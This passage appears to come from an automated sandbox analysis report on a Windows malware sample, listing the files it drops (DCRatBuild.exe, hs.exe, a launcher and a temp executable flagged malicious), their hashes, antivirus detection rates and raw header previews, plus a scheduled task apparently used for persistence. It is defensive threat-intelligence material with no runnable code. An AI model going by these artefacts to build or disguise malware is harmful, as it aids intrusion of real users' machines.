Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	471
Entropy (8bit):	7.151594243893602
Encrypted:	false
SSDEEP:	12:JuGfG5qPGyf9flSWjaH4Pf8E8sgiRCbVMDo/yhG2:JlGIN3ShH4fFtfWVxR2
MD5:	3486C3937584525A0D4C7BE5D1BD3C47
SHA1:	3D0552B9CAAF56FB6043D4F86C0129BA6EEA7665
SHA-256:	D93E2DA7E5C7F7CDBB4B6EEC5CD2A07657870587969D866959751767DE04DF14
SHA-512:	227FDC9E19DDD9EF5B22F816401EAE5D139EE000F622426CDED35C5D28BBEA39AD0096C5057E89AC33D6F5644FD5A0E2117FD5B1C018109432D7792BD087BE22
Malicious:	false
Preview:	0..........0.....+.....0......0...0......N"T ....n..........9..20250109190220Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9....n.U_$t...]......20250109190220Z....20250116190220Z0...*.H..............".2"..U..M)."...V.c..yC...d..'...f.{@.aV.t....u.i.....2.l."_V.(.O.T.k..=..M.3....2..q.&. r.....n...;XJG.X..O.6...8m.7....%......;.h...%....ni....8..Ph......B$..W.9b....W..V....g7..W-.6Or...F.#-....$a.%Nr...a.5;~.3..B]...%.4l.tB.A.. +.R.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	471
Entropy (8bit):	7.200722714277247
Encrypted:	false
SSDEEP:	6:J0MwGvf8X5o7D82TwrUGu0y9QfO9f0c9CkEnC8jmFRTS+kl6Dk6cnwvpZWLYWreb:JuGs5qPGu0Y9flYrjgIl4Zgo5
MD5:	52597E9D833A0C26E46E45B7AB100B18
SHA1:	970FA6CAE553ED67A7F0F85F27AF755804CA2C3F
SHA-256:	4948B08D75D8B8102065132037FED397534902CA17F972E9F61943404BA6351F
SHA-512:	7B62C096019F5917DA5726A1B2B0D585A5143A5DA307F0B438277D557989E75C9BABC701216712320A99E9BDAAD1005C30DB8F56160671763CC4847EDBD4105F
Malicious:	false
Preview:	0..........0.....+.....0......0...0......N"T ....n..........9..20250109190147Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9....e&D.^=.8t.]......20250109190147Z....20250116190147Z0....H..............)..U...>.l..e{.......Z......mp.e'..~A9f%..32....E....0.......P...`......(E\tB>H.;...... .L^.Q.G.P,..B.O.`.....E?T...%...J....X_..P.A........"[...\....@V#%.eZ!B.N...]...drSw...t...]....t....A...^..>.Xt.Z.M%1.....z...83.a...;".}j..c......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	471
Entropy (8bit):	7.128345702861358
Encrypted:	false
SSDEEP:	6:J0MwGvLk5o7D82TwrUGJbqS9QLU0cFVEnZp815Eg31Tzx0TeckHeDqI+LPkNIq9J:JuGjk5qPGJpuUl6UEyF+WIRaHbYoCNn
MD5:	71A1407A7319F8E35C6B9E7D3DD0E793
SHA1:	CE6B5717603853D4EF0AA89D0DD794DAE6814780
SHA-256:	616E3E561DBFC729DDC325394F74FA3906C9038956A9A7CCA0E689444A63216E
SHA-512:	F31CD698CAD3D5B15A6F53D90D8F517574F5EF9FBF6E9114DF202A85A2D01A14B0F28298E28F0C8F2D221536A167E26399753DA512E69FB1387F343F6EEF76F3
Malicious:	false
Preview:	0..........0.....+.....0......0...0......N"T ....n..........9..20250109190253Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9...C.P..5/..y.r..P....20250109190253Z....20250116190253Z0...*.H.............Z.\.z0....o.......2f..1A......P.7...._.K.r9o...)f.t.a...L..s...Ja.5R....b..........(.\|$q.4<....V....c6.0i...(..@.......%.2.zp.z^.\|...s7.\|&....R)._.G+8U...#T.....I.E........9S..i..I..cf....g..H..MS5Bi.......}6.J..=P.=Jh..7cpt.......8^.R.c.R.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	7796
Entropy (8bit):	7.971943145771426
Encrypted:	false
SSDEEP:	192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
MD5:	FB60E1AFE48764E6BF78719C07813D32
SHA1:	A1DC74EF8495C9A1489DD937659B5C2875027E16
SHA-256:	EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
SHA-512:	92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
Malicious:	false
Preview:	MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..\|..9.........{...\|d..v.T..w.TMZ.\|...).F.rtAm.....f......T........n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..\|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...\|.h..$."r..hL9TR..}.v%...4).H..[.....r..\|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X\|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.296636845611986
Encrypted:	false
SSDEEP:	6:kK7LcK81F9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:zLcK0sDImsLNkPlE99SNxAhUe/3
MD5:	35CF93EF39B2CB58A7183E04836A0B24
SHA1:	5F50955387253DA5827A25EBE992BE1FCC160D09
SHA-256:	DE308205F62F6A665F3B1BE29E777F16534F86D0132975EA669DD52645514515
SHA-512:	9C37CBFAF7CE02288EB6A0DF1DCE2B24DA0285959AB0C333747288EC3FFF909417562892C88167689BD12FB7419EF95149A589DE4BA155B6173113C07751074C
Malicious:	false
Preview:	p...... .........;nVtc..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.67304916708384
Encrypted:	false
SSDEEP:	6:kKEms6/ts1meHXlRNfOAUMivhClroFFKIhipStaHAaloq09Slscqsn:vs+rEmxMiv8sFFKbpgal7BlSs
MD5:	96FC984DCA7BFDB30F893E14B0A9281D
SHA1:	5251930E9B7FE9AAAABBA6B4E94B56E747DDF4AE
SHA-256:	8481FA8198A9177FE4A3454C7FA9649EED6ADAD6CADBDA24A927E3F191F2D9B2
SHA-512:	94D2D1857B5A4D8D4FF6447121A9EE266EC077905CE1A859B10C2AB04E2B00C882C9A46AAB2E256A32F201157E01A5A1C9F4A41EA53EFFA748FC1D08CD9BB2BA
Malicious:	false
Preview:	p...... ....(...6wN.sc..(..................................................*Ih.. ........"..pc.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.n.5.b.s.K.V.V.V.8.k.d.J.6.v.H.l.3.O.1.J.0.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.6585214121910314
Encrypted:	false
SSDEEP:	6:kKghOdsAXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsQ30P7v+eWAkrn:3NmxMiv8sFFKbpgal7BlD30PLRWAkr
MD5:	892FD1B724C7B61B67B325F59BFE8B3C
SHA1:	313EEB7868DCDE963275869243663825A7D937F0
SHA-256:	051F08FE60AE2E71EAA4067100CF3F3B8844174A00760326D76DCB51AF119F59
SHA-512:	73D228F5C8200F0E9DBCB6AE38971DF4356300110652AE80F942AA8E1EDE707B6997418A06FF6D920C7B4D8E1CEA2A01FC3E2153FE088CBCD0F09320393994A0
Malicious:	false
Preview:	p...... ....(....HD tc..(.................................................G.Ih.. ........3..oc.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.U.Z.Z.S.Z.E.m.l.4.9.G.j.h.0.j.1.3.P.6.8.w.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	3.6469450712048035
Encrypted:	false
SSDEEP:	6:kKlYvsEsZwi+EXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:mUBTmxMiv8sFFKbpgal7BlwhZg
MD5:	CB6EEA8D74EB775AA2D8C4C44842BDA2
SHA1:	F04663BA24A1D7824F7CA75C03B3A9974673DF79
SHA-256:	C0B2521AFD87ADD8CA97DF0B98BAB53EA4910C3B325703E9F5FC71DFDBFE40DD
SHA-512:	018E6DAF5A5916F8A43FD9DD38CFCD69E98D8BE2AF4AEAE6B74F129C5A680B515701E84DC13F7B55BF35730E82E225C135D2A1F6C9A96FF0DEF1D796E4419347
Malicious:	false
Preview:	p...... ....(.....P.tc..(.................................................>Ih.. ..........]sc.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.2871522304528487
Encrypted:	false
SSDEEP:	6:kKNeK81wNSWsCN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:4K0FkPlE99Si1QyIeek
MD5:	3145CF06CA364050E91684AD872EAB1E
SHA1:	B262CF66EE377A93F0CF5EB8FB83F9E6C3C23274
SHA-256:	22BF76C2935D84AED1C8ACD2EFE500ABA7E6F30C469BEFD80760E382D59B61F2
SHA-512:	6AD08C6B1D051D4B5C5F47D2758FA3DC09B63EA3CB48DD288164E184F645A366E7F22D8481460A1B15609AA4BE8B8C4CD17162B421ABDB535B7D8D633873A6CF
Malicious:	false
Preview:	p...... ........7jx2tc..(....................................................... ........B@!........(....0."....t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Download File

Process:	C:\Users\user\Desktop\launcher.exe.bin.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1899637
Entropy (8bit):	7.918618543421319
Encrypted:	false
SSDEEP:	24576:2TbBv5rUyXVo5WxMEvgd8cYCALW4btHABTTg1UySiLxTIVkxyQZULFo8B599By0w:IBJJMRvaWLO1UELhhxl8786PaV
MD5:	95AB7F1022401E488C0C50E6E5E8937F
SHA1:	FF312060768D93BC83E157C63F3A583CCACD4967
SHA-256:	699D1FA49CC0A591EBE89FD50E0A1F1B6131F018B072FB242EAABCCE787D84F3
SHA-512:	4A0E8EA87D0DDBEDBCD341B061B9BB7240C4DFE823BA7DA5627B53EB017B6FF2A7894B0874C2B0ED8B806C21827CFC686B12C07266D6498208FB5F20ED7EE847
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 51%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15oesi4o.qpf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rkc4o4m.k25.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmver55m.tlw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fyqelwxz.4fl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5mzljsq.mio.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjaxmpgb.5ie.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjf3eayx.cjs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1sdcyf0.cqb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\hs.exe

Download File

Process:	C:\Users\user\Desktop\launcher.exe.bin.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6008408
Entropy (8bit):	7.677314958287387
Encrypted:	false
SSDEEP:	98304:EDBso67ytJ/clo+5tFKoWQ9+Zzt2GWSDcd3bh1OF+fC5XujafTZBi9MIvRsGA2de:cyoJX27TEzdnI1CDwag1sXrvt
MD5:	8E222E8F9A186F8D21BF2895E1946853
SHA1:	07B2087B8B9D2A2F3C23BF59286C21C6AEFBF19F
SHA-256:	9942C7CC38D9DBCB8BFB81D83A31671FA389409E0F8C4A02DB2DBE90E1669EE3
SHA-512:	6DFFAA9204D67B3A5A38441BF8C653B787A3AA3133A298CCBDECB97A4A7887F178A61030AC6D0BA66031A30BCE3DD209478C778ACBA3870D00FCAB6EBB3A4D79
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d.....bg...............&......[..*.............@............................. \.....%G\...`... ...............................................[.4.....\. ....p[.......[.X&....\.0............................P[.(.....................[.P............................text...............................`..`.data... SY......TY.................@....rdata..PC... [..D....[.............@..@.pdata.......p[......H[.............@..@.xdata..<.....[......\[.............@..@.bss.....)....[..........................idata..4.....[......l[.............@....CRT....`.....[......x[.............@....tls..........[......z[.............@....rsrc... .....\......\|[.............@....reloc..0.....\.......[.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\launcher.exe

Download File

Process:	C:\Users\user\Desktop\launcher.exe.bin.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	262656
Entropy (8bit):	6.553041939953557
Encrypted:	false
SSDEEP:	6144:Nkvrt29qftuV1DCq5vF7PGYKINUf6TUIa1bq/KMw+:YrtUbPjKjf6J
MD5:	158FAFA10D2218AA47999131194736F2
SHA1:	27D12D326A145B771DAC80AE1AD87CF7A5B7785A
SHA-256:	8BA915193E092D44BAD17E01C4E5BE8FA5278CA2AC3D9769168C666321FC0406
SHA-512:	B620773D7700D518A5BFB1F71D1D40B5EB9EE6FC1D41CA6A224B3E4395B8510E0D55D6004AD0DEE6D99E61C57FEDD85BC2F3529F8C9FC08E1B37B853AE4F203B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."g&_f.H.f.H.f.H.o~..h.H..zL.l.H..zK.e.H..zM.F.H..zI.`.H.-~I.o.H.f.I.f.H..{A.`.H..{..g.H.f...g.H..{J.g.H.Richf.H.........PE..d...8G.g.........."....#............h..........@.............................@............`.................................................t........ ..........d............0.......`..p...........................P_..@............0..h............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..d...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ylbujkauzmzd.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\hs.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	150528
Entropy (8bit):	5.769203996328619
Encrypted:	false
SSDEEP:	3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
MD5:	658AC2968AC81EADBE165CFD2A770C34
SHA1:	39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
SHA-256:	4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
SHA-512:	CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\Tasks\ApplicationFrameHost

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3314
Entropy (8bit):	3.584165446641373
Encrypted:	false
SSDEEP:	48:yei1q97p9nW0QnRi6lVab9RnknD9V9Lvarx+i3iudupRCRvA9ufAuRa7T5XhPsV7:tKnRiMEpRnknNGki3igVA9ll7dhFl+
MD5:	C530BA29C0FF22D97D739D757A95175B
SHA1:	16FBB3CF6127BB2D34EA958DA13AFA881BD1277D
SHA-256:	93495C9B6233F26E726E81AADAE9CD868887961EC0A925696E0D3172B4C05A40
